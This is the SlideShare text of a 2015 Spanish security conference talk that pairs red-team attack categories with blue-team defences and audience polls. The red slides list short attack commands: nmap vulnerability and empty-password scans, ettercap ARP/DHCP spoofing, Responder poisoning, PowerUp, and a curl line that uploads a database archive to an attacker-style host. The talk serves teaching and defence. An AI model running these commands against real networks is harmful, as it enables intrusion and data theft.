Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.
Rojos/Azules: dos equipos
con dos sabores
Alejadro Ramos - 2015
Introducción.
• Modo colaborativo.
• Se introducirá un tema y hacemos encuesta vía web.
• Al acabar vemos las respuestas y...
• Fecha de creación: lunes, 02 de marzo de 2015
274
• Respuestas totales
• Respuestas completas: 182
Metodología: Assume Breach (Microsoft)
Metodología que da por perdida la primera parte de la batalla,
consiste en detectar...
¿Qué es para ti un Red Team?
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1
¿Seguridad ofensiva?
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7
Red Team.
The Red Team is a group of full-time staff within <company>
that focuses on breaching client infrastructure, pla...
¿Qué es para ti un Blue Team?
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14
¿Seguridad defensiva?
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17
Blue Team.
The Blue Team is comprised of either a dedicated set of
security responders or members from across the security...
¿SQLMap o mod_security?
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17
Así están las cosas para los azules.
MTTC/MTTP Top 6 ataques
MTTD/MTTR Top 6 defensas
Desde una perspectiva de ejercicio con escenario interno.
Red Top 1/6: Credenciales.
• WTF. Lo mismo de siempre, 30 años después.
• Por eso sigue en el Top.
• Ejemplos:
• Contraseñ...
Blue Top 1/6: Credenciales.
Soluciones complejas (… por eso sigue en el top …)
• Robustecer “Passfilt.dll” de Windows con ...
¿Solución a las contraseñas?
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
Red Top 2/6: Vulnerabilidades en aplicaciones.
• Exploits conocidos o por conocer.
• Ejemplos:
• shellshock, heartbleed, j...
Blue Top 2/6: Vulnerabilidades en aplicaciones.
• Arquitectura de red: segmentación de red, reglas en firewall internos.
•...
¿Método DELETE, PUT en un
servidor web?
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
Red Top 3/6: Ataques de red.
• Ataques Man In The Middle en sus 300 formas.
• Ejemplos:
• ARP Spoofing.
• WPAD Poisoning, ...
Blue Top 3/6: Ataques de red.
• Aplicación de Network Access Control.
• Configuración de Dynamic ARP Inspection.
• Habilit...
¿Están superados los ataques de
red?
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30
Red Top 4/6: Privilegios
• De usuario guarrete a local admin, de local
admin a domain admin y de ahí al infinito.
• Ejempl...
Blue Top 4/6: Privilegios.
• Eliminar acceso al cmd y powershell.
• Meter en el registro una entrada no aceptando el EULA ...
En tu empresa, ¿Tienes
administrador local de tu PC?
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
Red Top 5/6: In/Exfiltración
• Introducir o exportar información de la red. Documentos, herramientas o
cualquier otro tipo...
Blue Top 5/6: In/Exfiltración.
• Inspección de SSL en navegación.
• Bloqueo de categorías tipo hacking, malware, etc.
• Bl...
¿Tu método favorito para mandar
documentación confidencial a
casa?
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33
¿Cuál tu top red 6?
¿Cuál es tu top blue 6?
Gracias.
Alejandro Ramos – Marzo 2015
www.securitybydefault.com / @aramosf
http://secby.me/redbluerespuestas
Próxima SlideShare
Cargando en…5
×

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores

2.422 visualizaciones

Publicado el

Presentación de RootedCon, las respuestas se dieron durante la charla y se han incrustado en la presentación al acabar.

Publicado en: Tecnología
  • Sé el primero en comentar

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores

  1. 1. Rojos/Azules: dos equipos con dos sabores Alejadro Ramos - 2015
  2. 2. Introducción. • Modo colaborativo. • Se introducirá un tema y hacemos encuesta vía web. • Al acabar vemos las respuestas y opinamos sobre ellas. • Se espera vuestra participación (!!) • Para que tenga sentido, vamos haciendo el test todos a la vez. URL: http://secby.me/redblueteam
  3. 3. • Fecha de creación: lunes, 02 de marzo de 2015 274 • Respuestas totales • Respuestas completas: 182
  4. 4. Metodología: Assume Breach (Microsoft) Metodología que da por perdida la primera parte de la batalla, consiste en detectar gaps en las siguientes tácticas, técnicas y procedimientos (TTP): • Detección de ataques y penetraciones. • Respuesta a los ataques y penetraciones. • Recuperación de la fuga, modificación o compromiso de información. • Prevención de futuros ataques y penetración.
  5. 5. ¿Qué es para ti un Red Team?
  6. 6. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
  7. 7. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
  8. 8. ¿Seguridad ofensiva?
  9. 9. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
  10. 10. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
  11. 11. Red Team. The Red Team is a group of full-time staff within <company> that focuses on breaching client infrastructure, platform and client own tenants and applications. They are the dedicated adversary (a group of ethical hackers) performing targeted and persistent attacks. - Microsoft Objetivo medible mediante: • Tiempo medio para comprometer - Mean Time to Compromise (MTTC) • Tiempo medio para escalar privilegios o pwnage - Mean Time to Privilege Escalation or “Pwnage” (MTTP)
  12. 12. ¿Qué es para ti un Blue Team?
  13. 13. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
  14. 14. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
  15. 15. ¿Seguridad defensiva?
  16. 16. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
  17. 17. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
  18. 18. Blue Team. The Blue Team is comprised of either a dedicated set of security responders or members from across the security incident response, Engineering and Operations organizations. -Microsoft Objetivo medible mediante: • Tiempo medio de detección - Mean-Time to Detect (MTTD) • Tiempo medio de recuperación - Mean-Time to Recovery (MTTR) Predecir Prevenir Detectar Responder
  19. 19. ¿SQLMap o mod_security?
  20. 20. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
  21. 21. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
  22. 22. Así están las cosas para los azules.
  23. 23. MTTC/MTTP Top 6 ataques MTTD/MTTR Top 6 defensas Desde una perspectiva de ejercicio con escenario interno.
  24. 24. Red Top 1/6: Credenciales. • WTF. Lo mismo de siempre, 30 años después. • Por eso sigue en el Top. • Ejemplos: • Contraseñas en el Group Policy Preferences. • Contraseñas en los comentarios de un usuario del directorio activo. • SQL Server sa/<blank> Oracle: SYSTEM/MANAGER • Marzo2015 o similares como contraseña en AD. • Y eso, si no hay un xls con todas las passwords en una carpeta pública en un file server… 5 mins pwnage: • nmap -p 1433 --script ms-sql-empty-password
  25. 25. Blue Top 1/6: Credenciales. Soluciones complejas (… por eso sigue en el top …) • Robustecer “Passfilt.dll” de Windows con aplicación de terceros. • Sistemas de salto “jumpbox” monitorizados. • Soluciones de doble factor de autenticación. • Aplicar acceso 4eyes a contraseñas sensibles / OTP • “Honeyusers” con usuarios que únicamente ejecutan alertas. • Monitorización exhaustiva de logins fallidos. • Gestión de Identidades. • Políticas de contraseñas, Captchas, bloqueos, etc…
  26. 26. ¿Solución a las contraseñas?
  27. 27. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
  28. 28. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
  29. 29. Red Top 2/6: Vulnerabilidades en aplicaciones. • Exploits conocidos o por conocer. • Ejemplos: • shellshock, heartbleed, jetleak… • Los XP que quedan por ahí muertos. • Java/Flash. • Software de backup. • Webs con RCE/LFI, etc. 5 mins pwnage: • nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 … • nmap -p 443 --script ssl-heartbleed … • Metasploit … • ./exploit-db.py
  30. 30. Blue Top 2/6: Vulnerabilidades en aplicaciones. • Arquitectura de red: segmentación de red, reglas en firewall internos. • Uso de IPS. • Despliegue automático de parches: • Windows: SCCM/WSUS . • Linux: Satellite/Spacewalk/Landscape • chef/puppet/salt, etc • EMET - Enhanced Mitigation Experience Toolkit. • Grsecurity. • Controles en navegación. Ej: alertas con User-Agents específicos de Java. • Vulnerability Scans y Revisiones de cumplimiento.
  31. 31. ¿Método DELETE, PUT en un servidor web?
  32. 32. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
  33. 33. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
  34. 34. Red Top 3/6: Ataques de red. • Ataques Man In The Middle en sus 300 formas. • Ejemplos: • ARP Spoofing. • WPAD Poisoning, LLMNR Poisoning. • DHCP Spoofing. • Rogue/Fake AP 5 mins pwnage: • ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/ /192.168.1.1/ • Responder -i 192.168.1.100 -wrf • ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1 Imagen de: http://www.sternsecurity.com/
  35. 35. Blue Top 3/6: Ataques de red. • Aplicación de Network Access Control. • Configuración de Dynamic ARP Inspection. • Habilitar DHCP Snooping. • El uso de protocolos cifrados. • Desactivar IPv6. • Desactivar Multicast Name Resolution. • Evitar el uso de WPAD • Implantar Wireless intrusion detection system • Segmentación de red. • Firewall / IPS
  36. 36. ¿Están superados los ataques de red?
  37. 37. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
  38. 38. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
  39. 39. Red Top 4/6: Privilegios • De usuario guarrete a local admin, de local admin a domain admin y de ahí al infinito. • Ejemplos: • Servicios con permisos incorrectos. • Binarios en local o servidores de ficheros con permisos incorrectos. • Uso de usuarios de aplicación privilegiados. • Usuarios del dominio con privilegios de Local Admin. • sudo demasiado permisivo. 5 mins pwnage: • PowerUp.ps1: Invoke-AllChecks • Sticky keys • Kon-Boot
  40. 40. Blue Top 4/6: Privilegios. • Eliminar acceso al cmd y powershell. • Meter en el registro una entrada no aceptando el EULA de sysinternals (y proteger sus permisos). • Activar UAC/Firewall de Windows. • Permisos en las tareas programadas. • Uso de listas blancas de binarios, comprobación de firmas, AppLocker, etc. • Eliminar acceso a USB/CD (bios) • Cifrar contenido del disco duro, bitlocker y similares.
  41. 41. En tu empresa, ¿Tienes administrador local de tu PC?
  42. 42. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
  43. 43. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
  44. 44. Red Top 5/6: In/Exfiltración • Introducir o exportar información de la red. Documentos, herramientas o cualquier otro tipo de fichero. • Ejemplos: • Mediante HTTP por el proxy. • Correos electrónicos. • Túneles DNS. • IM 5 mins pwnage: • curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
  45. 45. Blue Top 5/6: In/Exfiltración. • Inspección de SSL en navegación. • Bloqueo de categorías tipo hacking, malware, etc. • Bloquear la descarga de ejecutables y derivados. • En caso de dominios no conocidos, página de bienvenida. • Bloqueo de dominios jóvenes, Ej <20 días. • Limitar peticiones POST, Ej cabeceras mayores de 50kb. • No resolver DNS de Internet desde las workstation. • Firmas específicas en IPS para túneles y otros covert channels. • Bloqueo o cifrado de USB. • Antivirus.
  46. 46. ¿Tu método favorito para mandar documentación confidencial a casa?
  47. 47. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
  48. 48. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
  49. 49. ¿Cuál tu top red 6?
  50. 50. ¿Cuál es tu top blue 6?
  51. 51. Gracias. Alejandro Ramos – Marzo 2015 www.securitybydefault.com / @aramosf http://secby.me/redbluerespuestas

×